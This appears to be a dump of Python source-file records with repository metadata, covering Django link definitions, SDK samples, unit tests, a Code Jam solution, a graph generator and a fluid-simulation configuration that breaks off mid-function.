text=_('System mailer error log'), view='mailer:system_mailer_error_log',
)
link_user_mailer_create = Link(
icon_class=icon_user_mailer_create,
permissions=(permission_user_mailer_create,),
text=_('User mailer create'), view='mailer:user_mailer_backend_selection',
)
link_user_mailer_delete = Link(
args='resolved_object.pk', permissions=(permission_user_mailer_delete,),
tags='dangerous', text=_('Delete'), view='mailer:user_mailer_delete',
)
link_user_mailer_edit = Link(
args='object.pk', permissions=(permission_user_mailer_edit,),
text=_('Edit'), view='mailer:user_mailer_edit',
)
link_user_mailer_log_list = Link(
args='object.pk', permissions=(permission_user_mailer_view,),
text=_('Log'), view='mailer:user_mailer_log',
)
link_user_mailer_list = Link(
icon_class=icon_user_mailer_list,
permissions=(permission_user_mailer_view,),
text=_('Mailing profiles list'), view='mailer:user_mailer_list',
)
link_user_mailer_setup = Link(
icon_class=icon_user_mailer_setup,
permissions=(permission_user_mailer_view,),
text=_('Mailing profiles'), view='mailer:user_mailer_list',
)
link_user_mailer_test = Link(
args='object.pk', permissions=(permission_user_mailer_use,),
text=_('Test'), view='mailer:user_mailer_test',
)
| [
"roberto.rosario.gonzalez@gmail.com"
] | roberto.rosario.gonzalez@gmail.com |
89a57b2761ac7eb2700a21a0db54eb81630a8f82 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_135/688.py | 93210bdda7e5caabc402c9844a34c004ac9fb43c | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 531 | py | def solve(a, A, b, B):
s = set(A[a-1]).intersection(set(B[b-1]))
if len(s) == 1:
return str(list(s)[0])
if len(s) == 0:
return "Volunteer cheated!"
if len(s) > 1:
return "Bad magician!"
def main():
T = int(raw_input())
for t in xrange(1, T+1):
a = int(raw_input())
A = [map(int, raw_input().split()) for i in xrange(4)]
b = int(raw_input())
B = [map(int, raw_input().split()) for i in xrange(4)]
print "Case #{0}: {1}".format(t, solve(a, A, b, B))
if __name__ == '__main__':
main()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
8b349f526cd1c606c03ddd508c7189b821aade82 | 9e5353ba6e50f77a40a765bd494d8bfb990c8922 | /scratch/socket_test.py | df65b498efcb3ac969bc64dd918a76b336d66797 | [] | no_license | admiralbolt/stream-stuff | d9e24f1d78ac142416525b9b42cc53ef0bc4712a | 29cfa96f9e8d40c531362aced47ebacadccbe759 | refs/heads/master | 2023-08-05T00:02:17.812991 | 2021-09-23T05:47:16 | 2021-09-23T05:47:16 | 261,022,447 | 7 | 0 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | import asyncio
import sys
import os
import time
import websockets
sys.path.append(os.path.realpath(os.path.join(
os.getcwd(),
"..",
"stream_backend/api/utils"
)))
sys.path.append(os.path.realpath(os.path.join(
os.getcwd(),
"..",
"stream_backend"
)))
from websocket_client import WebSocketClient
websocket_client = WebSocketClient(7004)
asyncio.run(websocket_client.connect(), debug=True)
async def cool():
websocket_client = WebSocketClient(7004)
await websocket_client.connect()
print(websocket_client.socket.open)
await websocket_client.send("asdf")
async def test():
uri = "ws://localhost:7004"
async with websockets.connect(uri) as websocket:
print(websocket.open)
await websocket.send("asdf")
asyncio.run(cool())
| [
"aviknecht@gmail.com"
] | aviknecht@gmail.com |
40bf64c084dd22ce89891bfea90ef07df3538dbf | e3c8f786d09e311d6ea1cab50edde040bf1ea988 | /Incident-Response/Tools/dfirtrack/dfirtrack_main/tests/system_importer/test_system_importer_file_csv_forms.py | b37856c7b92f51a0a17dc34c1510029c05cfcafc | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | foss2cyber/Incident-Playbook | d1add8aec6e28a19e515754c6ce2e524d67f368e | a379a134c0c5af14df4ed2afa066c1626506b754 | refs/heads/main | 2023-06-07T09:16:27.876561 | 2021-07-07T03:48:54 | 2021-07-07T03:48:54 | 384,988,036 | 1 | 0 | MIT | 2021-07-11T15:45:31 | 2021-07-11T15:45:31 | null | UTF-8 | Python | false | false | 1,512 | py | from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import TestCase
from dfirtrack_main.importer.file.csv_importer_forms import SystemImporterFileCsvForm
class SystemImporterFileCsvFormTestCase(TestCase):
""" system importer file CSV form tests """
def test_system_importer_file_csv_systemcsv_form_label(self):
""" test form label """
# get object
form = SystemImporterFileCsvForm()
# compare
self.assertEqual(form.fields['systemcsv'].label, 'CSV with systems (*)')
def test_system_importer_file_csv_form_empty(self):
""" test minimum form requirements / INVALID """
# get object
form = SystemImporterFileCsvForm(data = {})
# compare
self.assertFalse(form.is_valid())
def test_system_importer_file_csv_systemcsv_form_filled(self):
""" test minimum form requirements / VALID """
# get file
upload_csv = open('dfirtrack_main/tests/system_importer/system_importer_file_csv_files/system_importer_file_csv_testfile_01_minimal_double_quotation.csv', 'rb')
# create dictionaries
data_dict = {}
file_dict = {
'systemcsv': SimpleUploadedFile(upload_csv.name, upload_csv.read()),
}
# get object
form = SystemImporterFileCsvForm(
data = data_dict,
files = file_dict,
)
# close file
upload_csv.close()
# compare
self.assertTrue(form.is_valid())
| [
"a.songer@protonmail.com"
] | a.songer@protonmail.com |
63a46a45858243d9ebeee22d91f29779a70a5139 | dfcb65de02953afaac24cc926ee32fcdede1ac21 | /src/pyrin/utilities/string/normalizer/interface.py | 2ce7bc744c3717bbd93b06339e34ad637f686f5b | [
"BSD-3-Clause"
] | permissive | mononobi/pyrin | 031d0c38da945b76b07ea100554ffc7f8081b05e | 9d4776498225de4f3d16a4600b5b19212abe8562 | refs/heads/master | 2023-08-31T03:56:44.700142 | 2023-08-20T22:20:06 | 2023-08-20T22:20:06 | 185,481,041 | 20 | 8 | null | null | null | null | UTF-8 | Python | false | false | 1,585 | py | # -*- coding: utf-8 -*-
"""
string normalizer interface module.
"""
from abc import abstractmethod
from threading import Lock
from pyrin.core.structs import CoreObject, MultiSingletonMeta
from pyrin.core.exceptions import CoreNotImplementedError
class StringNormalizerSingletonMeta(MultiSingletonMeta):
"""
string normalizer singleton meta class.
this is a thread-safe implementation of singleton.
"""
_instances = dict()
_lock = Lock()
class AbstractStringNormalizerBase(CoreObject, metaclass=StringNormalizerSingletonMeta):
"""
abstract string normalizer base class.
"""
@abstractmethod
def normalize(self, value, *args, **options):
"""
normalizes the given value.
:param str value: value to be normalized.
:keyword bool strip: strip spaces from both ends of value.
defaults to True if not provided.
:keyword bool normalize_none: specifies that if given value is None,
return empty string instead of None.
defaults to False if not provided.
:raises CoreNotImplementedError: core not implemented error.
:returns: normalized value.
:rtype: str
"""
raise CoreNotImplementedError()
@property
@abstractmethod
def priority(self):
"""
gets the priority of this normalizer.
:raises CoreNotImplementedError: core not implemented error.
:rtype: int
"""
raise CoreNotImplementedError()
| [
"mohamadnobakht@gmail.com"
] | mohamadnobakht@gmail.com |
d5b2de6fa50598faa7966662ac5ed602f5303daa | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/datafactory/azure-mgmt-datafactory/generated_samples/integration_runtimes_get_monitoring_data.py | 162c40fb7e0725dfc7072eec2fbc63a3639f0451 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,716 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.datafactory import DataFactoryManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datafactory
# USAGE
python integration_runtimes_get_monitoring_data.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = DataFactoryManagementClient(
credential=DefaultAzureCredential(),
subscription_id="12345678-1234-1234-1234-12345678abc",
)
response = client.integration_runtimes.get_monitoring_data(
resource_group_name="exampleResourceGroup",
factory_name="exampleFactoryName",
integration_runtime_name="exampleIntegrationRuntime",
)
print(response)
# x-ms-original-file: specification/datafactory/resource-manager/Microsoft.DataFactory/stable/2018-06-01/examples/IntegrationRuntimes_GetMonitoringData.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
4e983363b19bdb916fd76195d601d24d9e9ee54c | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_1483485_0/Python/laurentr/translate.py | a0ba9e164e94e4f8cb12d6e20191bbc65c9ef4c7 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 647 | py | #!/usr/bin/python
from string import maketrans
googlerese = "qzejp mysljylc kd kxveddknmc re jsicpdrysi rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd de kr kd eoya kw aej tysr re ujdr lkgc jv"
english = "zqour language is impossible to understand there are twenty six factorial possibilities so it is okay if you want to just give up"
trad = maketrans(googlerese, english)
with open('./input.txt', 'r+') as f:
with open('./output.txt', 'w') as fout:
line = f.readline()
T = int(line)
for n in range(T):
line = f.readline()
fout.write("Case #"+str(n+1)+": "+line.translate(trad))
| [
"eewestman@gmail.com"
] | eewestman@gmail.com |
601d1d090416b33f87346019500e4e1cadd9f83c | ae5208474f3fc2a5f506e8bf0e8cdc62591f6f19 | /tests/test_softclip_clusterfinder.py | 1a655b8da68ef5dfc56fc7052ab010a253d4e273 | [
"MIT"
] | permissive | andurill/readtagger | e32ca519f955d4d80c0d4561e6ecb1e591be7458 | 127ec08c00c47d03dfb8e95b628c381d3e29a6c8 | refs/heads/master | 2020-04-27T19:58:15.549676 | 2019-03-29T16:18:23 | 2019-03-29T16:40:41 | 174,641,225 | 0 | 0 | null | 2019-03-09T03:00:12 | 2019-03-09T03:00:11 | null | UTF-8 | Python | false | false | 788 | py | from readtagger.find_softclip_clusters import (
SoftClipClusterFinder,
)
WRONG_TSD = 'wrong_tsd.bam'
MULTI_H6 = 'multisample_h6.bam'
def test_softclip_clusterfinder(datadir_copy, tmpdir): # noqa: D103, F811
input_path = str(datadir_copy[WRONG_TSD])
gff_out = tmpdir.join('out.gff').strpath
clusterfinder = SoftClipClusterFinder(input_path=input_path, output_gff=gff_out)
clusters = clusterfinder.clusters
assert len(clusters) == 8
def test_softclip_clusterfinder_multi_h6(datadir_copy, tmpdir): # noqa: D103, F811
input_path = str(datadir_copy[MULTI_H6])
gff_out = tmpdir.join('out.gff').strpath
clusterfinder = SoftClipClusterFinder(input_path=input_path, output_gff=gff_out)
clusters = clusterfinder.clusters
assert len(clusters) == 8
| [
"m.vandenbeek@gmail.com"
] | m.vandenbeek@gmail.com |
2d965d93ee20271285cb99c1135e2c911f7b5092 | 8b42c2c1fc8481f52e0c75d69cdd832029533a01 | /src/stump_data_pipeline/util/string.py | b8bd768816efe4a6f54917e1d762e51e27c4349b | [
"MIT"
] | permissive | stump-vote/stump-data-pipeline | 33e59e0e22ede06626421a2da7d52650b23294b0 | 7a8a27577f20cc4f4bdcbf20fe9664b69efa6953 | refs/heads/master | 2022-12-24T05:45:49.923308 | 2020-04-18T21:57:47 | 2020-04-18T21:57:47 | 253,142,064 | 0 | 1 | MIT | 2022-12-08T09:33:08 | 2020-04-05T02:44:15 | Python | UTF-8 | Python | false | false | 196 | py | def camel_to_snake(s):
return s[0] + "".join(
[
"_" + s[i].lower() if s[i - 1].islower() and s[i].isupper() else s[i]
for i in range(1, len(s))
]
)
| [
"galbwe92@gmail.com"
] | galbwe92@gmail.com |
90686270cec5374b3b24720cb1ca17eea5d31799 | 9acd4d3abca1058dade7771403e1eb9b7436f842 | /Plugins/Modules/importlib_resources/readers.py | 19450f461c8d58aec6de6bb92e55cd833af11c1d | [] | no_license | candy-kk/FrameScan | 900595c00e329200c792a7edd418e2e1cef1e539 | e4cfa0e6d0c457d14f7177c78b653b923184061a | refs/heads/master | 2023-05-10T15:45:46.565422 | 2023-04-12T04:56:15 | 2023-04-12T04:56:15 | 263,955,799 | 0 | 0 | null | 2020-05-14T15:40:27 | 2020-05-14T15:40:26 | null | UTF-8 | Python | false | false | 3,669 | py | import collections
import pathlib
import operator
from . import abc
from ._itertools import unique_everseen
from ._compat import ZipPath
def remove_duplicates(items):
return iter(collections.OrderedDict.fromkeys(items))
class FileReader(abc.TraversableResources):
def __init__(self, loader):
self.path = pathlib.Path(loader.path).parent
def resource_path(self, resource):
"""
Return the file system path to prevent
`resources.path()` from creating a temporary
copy.
"""
return str(self.path.joinpath(resource))
def files(self):
return self.path
class ZipReader(abc.TraversableResources):
def __init__(self, loader, module):
_, _, name = module.rpartition('.')
self.prefix = loader.prefix.replace('\\', '/') + name + '/'
self.archive = loader.archive
def open_resource(self, resource):
try:
return super().open_resource(resource)
except KeyError as exc:
raise FileNotFoundError(exc.args[0])
def is_resource(self, path):
# workaround for `zipfile.Path.is_file` returning true
# for non-existent paths.
target = self.files().joinpath(path)
return target.is_file() and target.exists()
def files(self):
return ZipPath(self.archive, self.prefix)
class MultiplexedPath(abc.Traversable):
"""
Given a series of Traversable objects, implement a merged
version of the interface across all objects. Useful for
namespace packages which may be multihomed at a single
name.
"""
def __init__(self, *paths):
self._paths = list(map(pathlib.Path, remove_duplicates(paths)))
if not self._paths:
message = 'MultiplexedPath must contain at least one path'
raise FileNotFoundError(message)
if not all(path.is_dir() for path in self._paths):
raise NotADirectoryError('MultiplexedPath only supports directories')
def iterdir(self):
files = (file for path in self._paths for file in path.iterdir())
return unique_everseen(files, key=operator.attrgetter('name'))
def read_bytes(self):
raise FileNotFoundError(f'{self} is not a file')
def read_text(self, *args, **kwargs):
raise FileNotFoundError(f'{self} is not a file')
def is_dir(self):
return True
def is_file(self):
return False
def joinpath(self, *descendants):
try:
return super().joinpath(*descendants)
except abc.TraversalError as exc:
# One of the paths didn't resolve.
msg, target, names = exc.args
if names: # pragma: nocover
raise
# It was the last; construct result with the first path.
return self._paths[0].joinpath(target)
def open(self, *args, **kwargs):
raise FileNotFoundError(f'{self} is not a file')
@property
def name(self):
return self._paths[0].name
def __repr__(self):
paths = ', '.join(f"'{path}'" for path in self._paths)
return f'MultiplexedPath({paths})'
class NamespaceReader(abc.TraversableResources):
def __init__(self, namespace_path):
if 'NamespacePath' not in str(namespace_path):
raise ValueError('Invalid path')
self.path = MultiplexedPath(*list(namespace_path))
def resource_path(self, resource):
"""
Return the file system path to prevent
`resources.path()` from creating a temporary
copy.
"""
return str(self.path.joinpath(resource))
def files(self):
return self.path
| [
"qianxiao996@126.com"
] | qianxiao996@126.com |
9f40d1c70876a29a78325e983cb7fc89dcffd860 | c9094a4ed256260bc026514a00f93f0b09a5d60c | /tests/components/abode/test_cover.py | bb1b8fceffb4d6028a08e4dce81c2148a8035c1a | [
"Apache-2.0"
] | permissive | turbokongen/home-assistant | 824bc4704906ec0057f3ebd6d92788e096431f56 | 4ab0151fb1cbefb31def23ba850e197da0a5027f | refs/heads/dev | 2023-03-12T05:49:44.508713 | 2021-02-17T14:06:16 | 2021-02-17T14:06:16 | 50,231,140 | 4 | 1 | Apache-2.0 | 2023-02-22T06:14:30 | 2016-01-23T08:55:09 | Python | UTF-8 | Python | false | false | 2,112 | py | """Tests for the Abode cover device."""
from unittest.mock import patch
from homeassistant.components.abode import ATTR_DEVICE_ID
from homeassistant.components.cover import DOMAIN as COVER_DOMAIN
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_FRIENDLY_NAME,
SERVICE_CLOSE_COVER,
SERVICE_OPEN_COVER,
STATE_CLOSED,
)
from .common import setup_platform
DEVICE_ID = "cover.garage_door"
async def test_entity_registry(hass):
"""Tests that the devices are registered in the entity registry."""
await setup_platform(hass, COVER_DOMAIN)
entity_registry = await hass.helpers.entity_registry.async_get_registry()
entry = entity_registry.async_get(DEVICE_ID)
assert entry.unique_id == "61cbz3b542d2o33ed2fz02721bda3324"
async def test_attributes(hass):
"""Test the cover attributes are correct."""
await setup_platform(hass, COVER_DOMAIN)
state = hass.states.get(DEVICE_ID)
assert state.state == STATE_CLOSED
assert state.attributes.get(ATTR_DEVICE_ID) == "ZW:00000007"
assert not state.attributes.get("battery_low")
assert not state.attributes.get("no_response")
assert state.attributes.get("device_type") == "Secure Barrier"
assert state.attributes.get(ATTR_FRIENDLY_NAME) == "Garage Door"
async def test_open(hass):
"""Test the cover can be opened."""
await setup_platform(hass, COVER_DOMAIN)
with patch("abodepy.AbodeCover.open_cover") as mock_open:
await hass.services.async_call(
COVER_DOMAIN, SERVICE_OPEN_COVER, {ATTR_ENTITY_ID: DEVICE_ID}, blocking=True
)
await hass.async_block_till_done()
mock_open.assert_called_once()
async def test_close(hass):
"""Test the cover can be closed."""
await setup_platform(hass, COVER_DOMAIN)
with patch("abodepy.AbodeCover.close_cover") as mock_close:
await hass.services.async_call(
COVER_DOMAIN,
SERVICE_CLOSE_COVER,
{ATTR_ENTITY_ID: DEVICE_ID},
blocking=True,
)
await hass.async_block_till_done()
mock_close.assert_called_once()
| [
"noreply@github.com"
] | turbokongen.noreply@github.com |
ac148293cc34566d29a0aabb1f1be353fc280f07 | 2aba62d66c2c622bdc148cef451da76cae5fd76c | /exercise/learn_python_dm2039/ch27/ch27_8.py | 47b5afb38beeb7cebb5ce67f0307e4f8d7ff2485 | [] | no_license | NTUT-109AB8011/crawler | 6a76de2ab1848ebc8365e071e76c08ca7348be62 | a703ec741b48d3af615a757fed7607b1f8eb66a6 | refs/heads/master | 2023-03-26T22:39:59.527175 | 2021-03-30T03:29:22 | 2021-03-30T03:29:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 520 | py | # ch27_8.py
import PyPDF2
pdfObj = open('travel.pdf','rb')
pdfRd = PyPDF2.PdfFileReader(pdfObj)
pdfWr = PyPDF2.PdfFileWriter() # 新的PDF物件
for pageNum in range(pdfRd.numPages):
pdfWr.addPage(pdfRd.getPage(pageNum)) # 一次將一頁放入新的PDF物件
pdfWr.encrypt('deepstone') # 執行加密
encryptPdf = open('output.pdf', 'wb') # 開啟二進位檔案供寫入
pdfWr.write(encryptPdf) # 執行寫入
encryptPdf.close()
| [
"terranandes@gmail.com"
] | terranandes@gmail.com |
61f0993386e6185701397450a63a17faaa724432 | 04cd80564d67e3e946ec66fd80e95b858693eae8 | /backend/home/models.py | 0b984ee292c699d3ac7c48b92354b8e56caff465 | [] | no_license | crowdbotics-apps/new-rn-app-dev-1106 | 3307dd21fc0605bd9f471367faca97d6da6d77d4 | 8948a5b8b52198b55ce24b6e60a1c9e24293056a | refs/heads/master | 2023-01-25T01:36:41.979381 | 2019-12-02T21:11:21 | 2019-12-02T21:11:21 | 221,566,041 | 0 | 0 | null | 2023-01-24T00:51:39 | 2019-11-13T22:47:04 | JavaScript | UTF-8 | Python | false | false | 558 | py | from django.db import models
# Create your models here.
from django.db import models
class CustomText(models.Model):
title = models.CharField(max_length=150,)
def __str__(self):
return self.title
@property
def api(self):
return f"/api/v1/customtext/{self.id}/"
@property
def field(self):
return "title"
class HomePage(models.Model):
body = models.TextField()
@property
def api(self):
return f"/api/v1/homepage/{self.id}/"
@property
def field(self):
return "body"
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
4cd8533c2ff400fe3f3a9e78e6a145027f886051 | a95f0a79e066393df65c201d10e4ba3a9d44d433 | /pragmatic/middleware.py | 11200e2db6436b5d888c680eff65c2c1b911d811 | [] | no_license | barseghyanartur/django-pragmatic | d2d03a0b61865ec49b11f3eddfa9a2cf705d6945 | b5118e06568ba8c15d129e25fd2ddd3c14648898 | refs/heads/master | 2020-07-27T07:40:12.153629 | 2019-09-12T08:58:55 | 2019-09-12T08:58:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,572 | py | from django.conf import settings
from django.http import HttpResponse
from django.template import loader
from django.template.response import SimpleTemplateResponse
try:
from django.utils.deprecation import MiddlewareMixin
except ImportError: # Django < 1.10
# Works perfectly for everyone using MIDDLEWARE_CLASSES
MiddlewareMixin = object
class MaintenanceModeMiddleware(MiddlewareMixin):
template_name = 'maintenance_mode.html'
def process_response(self, request, response):
# don't show maintenance mode screen if not required
if not getattr(settings, 'MAINTENANCE_MODE', False):
return response
# Check if we can bypass maintenance for current user
bypass = request.user.is_authenticated and request.user.pk in getattr(settings, 'MAINTENANCE_MODE_BYPASS_USERS', [])
# bypass maintenance mode if staff user is logged in
if bypass:
return response
# render maintenance mode screen template
try:
context_processors = settings.TEMPLATE_CONTEXT_PROCESSORS
except AttributeError:
context_processors = settings.TEMPLATES[0]['OPTIONS']['context_processors']
if 'django.core.context_processors.request' in context_processors or \
'django.template.context_processors.request' in context_processors:
template = loader.get_template(self.template_name)
return HttpResponse(template.render({}, request))
else:
return SimpleTemplateResponse(self.template_name).render()
| [
"erik.telepovsky@gmail.com"
] | erik.telepovsky@gmail.com |
4f66cd817ec45b42e7ca508ed4dc0006558881aa | d92f85e4345a12a245eec8266e14300b8e67d927 | /table print.py | 7c08d1571b9d2bfc3972690d51a55f56aa6b17cb | [] | no_license | ujalapraveen/Function | b13ce92926a3c65ad7f21ba2cb6baed023afa02c | 624145a55774695623a418fcf3a864f11fb6aec2 | refs/heads/main | 2023-06-25T01:40:43.927992 | 2021-07-13T08:41:36 | 2021-07-13T08:41:36 | 371,344,098 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py |
num= int(input("enter the number"))
a= int(input("enter the number"))
while num<=a:
i= 1
while i<=10:
s= num*i
print(num,"x",i,"=",s,"\n")
i= i+1
num= num+1
| [
"noreply@github.com"
] | ujalapraveen.noreply@github.com |
1833d5e8f4f06ef245347d7f9c37851e1e26bcc1 | dd70312e98b72c815368398b87dda55da7360b28 | /third-party/thrift/src/thrift/compiler/test/fixtures/patch/gen-py/thrift/annotation/java/constants.py | 0c3d96abb976d502b802bc337851b59efb1b466a | [
"Apache-2.0",
"PHP-3.01",
"MIT",
"Zend-2.0"
] | permissive | paulbiss/hhvm | ca6a8b4ac3e7b65dcf4029f9a59ce591c33c6cce | ddc087ddca8ab6b718c0567ec506139db300fdd1 | refs/heads/master | 2023-05-24T16:27:30.329476 | 2023-05-18T01:01:24 | 2023-05-18T01:01:24 | 63,633,816 | 0 | 0 | null | 2016-07-18T20:12:18 | 2016-07-18T20:12:17 | null | UTF-8 | Python | false | false | 653 | py | #
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
# @generated
#
from __future__ import absolute_import
import sys
from thrift.util.Recursive import fix_spec
from thrift.Thrift import TType, TMessageType, TPriority, TRequestContext, TProcessorEventHandler, TServerInterface, TProcessor, TException, TApplicationException, UnimplementedTypedef
from thrift.protocol.TProtocol import TProtocolException
from json import loads
import sys
if sys.version_info[0] >= 3:
long = int
import thrift.annotation.scope.ttypes
from .ttypes import UTF8STRINGS, Mutable, Annotation, BinaryString, Adapter, Wrapper
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
427743a45872def1a028777615f3412c9b13bb77 | bea159d40d7cedcff3f2edd17965005899d60666 | /cmd/help.py | 74f933bb02068ba176fd26ccf72a91461e969386 | [] | no_license | WaifuHarem/discord-bot | f8ebb7c793e7f1618c933b9e53939fdb8d47cd71 | 9002107776befba5b00d99eba3281b39a47f3018 | refs/heads/master | 2022-11-27T11:42:26.216412 | 2020-08-05T19:15:49 | 2020-08-05T19:15:49 | 275,703,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 477 | py | from cmd_core import Cmd
from cmd_proc import CmdProc
@Cmd.metadata(
perm = [
Cmd.perm.PUBLIC
],
info = 'Prints help text',
args = {
'cmd' : Cmd.arg(str, Cmd.OPTIONAL, 'Command to get help for')
}
)
async def help(msg, logger, **kargs):
cmd_name = Cmd.get(kargs, 'cmd')
if cmd_name == None:
await msg.channel.send('TODO: Help text')
return
await msg.channel.send(CmdProc.get_help(cmd_name))
return Cmd.ok() | [
"abraker95@gmail.com"
] | abraker95@gmail.com |
f85301e90db4db4e18ca83157c0040231567a14a | 6f7cc1e4ba9a58a8d84ff97d65a8f5a2f2e8fd19 | /src/products/migrations/0029_auto_20151216_0247.py | 3994550d3b479822c7c6713c0b8097cb4358be03 | [
"MIT"
] | permissive | LABETE/digitalmarket | f90f8220fed14f65ab9cabd16d57f00a22b94faf | fc5e81781cbd92535dfe7ecbcc5924058d475a5f | refs/heads/master | 2021-01-10T16:46:51.571972 | 2016-01-25T19:46:59 | 2016-01-25T19:46:59 | 50,375,708 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,167 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('products', '0028_productraiting_product'),
]
operations = [
migrations.CreateModel(
name='ProductRating',
fields=[
('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),
('rating', models.IntegerField(blank=True, null=True)),
('verified', models.BooleanField(default=False)),
('product', models.ForeignKey(to='products.Product')),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.RemoveField(
model_name='productraiting',
name='product',
),
migrations.RemoveField(
model_name='productraiting',
name='user',
),
migrations.DeleteModel(
name='ProductRaiting',
),
]
| [
"eddie.valv@gmail.com"
] | eddie.valv@gmail.com |
3f659e6b4e79f2a9e308aa065deef09c5f9d8873 | d319165fca8067a172fde00f9d058ebc833a5c43 | /cv1/utils/graph_generation/bianconi.py | 3620ef85e768e2d7539f4f06dab7eb9a23d7f1cf | [] | no_license | pro0255/MADII | 208a2c1d6a8b795865bc03beb41f4031e8a71453 | 7e4ab3aa0b506e7e4cc8ce08b681ecded1dd6e9d | refs/heads/master | 2023-04-12T15:29:13.202166 | 2021-04-27T11:24:31 | 2021-04-27T11:24:31 | 340,859,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,152 | py | import random
def bianconi(G_0, n, m, P_t):
G = G_0
t = 0
while(t < n):
adding_vertex = len(G.keys())
counter = 1
G, i1 = first_link(G, adding_vertex)
while counter < m:
G = second_link(G, adding_vertex, P_t, i1)
counter += 1
t+=1
return G
def first_link(G, adding_vertex):
verticies = G.keys()
r = random.choice(list(verticies))
G[r].append(adding_vertex)
if adding_vertex not in G:
G[adding_vertex] = []
G[adding_vertex].append(r)
return G, r
def second_link(G, adding_vertex, P, i1):
r = random.uniform(0, 1)
my_neighbors = G[adding_vertex]
if r < P:
neighbors = [v for v in G[i1] if v not in my_neighbors and v != adding_vertex and v != i1]
choice = random.choice(neighbors)
G[choice].append(adding_vertex)
G[adding_vertex].append(choice)
else:
options = [v for v in G.keys() if v not in my_neighbors and v != adding_vertex and v != i1]
choice = random.choice(options)
G[choice].append(adding_vertex)
G[adding_vertex].append(choice)
return G
| [
"prokop.vojtech@gmail.com"
] | prokop.vojtech@gmail.com |
8ef4373f7b87c866dcb782c0d597d200e0020fb8 | 7366ce3ba86cb6af2e9ee0923d4a74d028f08c72 | /3d/dambreak/twp_navier_stokes_p.py | 40a9fb0fa8012032b4ea02795ef9333476bac737 | [
"MIT"
] | permissive | erdc/air-water-vv | 56b939280d8d9fb81dc13b79a9de5a489e21e350 | f93ff99432703292b1d62c3e9689537eae44e864 | refs/heads/master | 2022-08-21T23:11:16.912042 | 2022-08-11T16:44:47 | 2022-08-11T16:44:47 | 21,613,939 | 5 | 21 | MIT | 2020-11-04T19:00:46 | 2014-07-08T13:36:39 | Python | UTF-8 | Python | false | false | 4,073 | py | from proteus import *
from proteus.default_p import *
from dambreak import *
from proteus.mprans import RANS2P
LevelModelType = RANS2P.LevelModel
if useOnlyVF:
LS_model = None
else:
LS_model = 2
if useRANS >= 1:
Closure_0_model = 5; Closure_1_model=6
if useOnlyVF:
Closure_0_model=2; Closure_1_model=3
if movingDomain:
Closure_0_model += 1; Closure_1_model += 1
else:
Closure_0_model = None
Closure_1_model = None
coefficients = RANS2P.Coefficients(epsFact=epsFact_viscosity,
sigma=0.0,
rho_0 = rho_0,
nu_0 = nu_0,
rho_1 = rho_1,
nu_1 = nu_1,
g=g,
nd=nd,
VF_model=1,
LS_model=LS_model,
Closure_0_model=Closure_0_model,
Closure_1_model=Closure_1_model,
epsFact_density=epsFact_density,
stokes=False,
useVF=useVF,
useRBLES=useRBLES,
useMetrics=useMetrics,
eb_adjoint_sigma=1.0,
eb_penalty_constant=weak_bc_penalty_constant,
forceStrongDirichlet=ns_forceStrongDirichlet,
turbulenceClosureModel=ns_closure,
movingDomain=movingDomain)
def getDBC_p(x,flag):
if flag == boundaryTags['top']:# or x[2] >= L[2] - 1.0e-12:
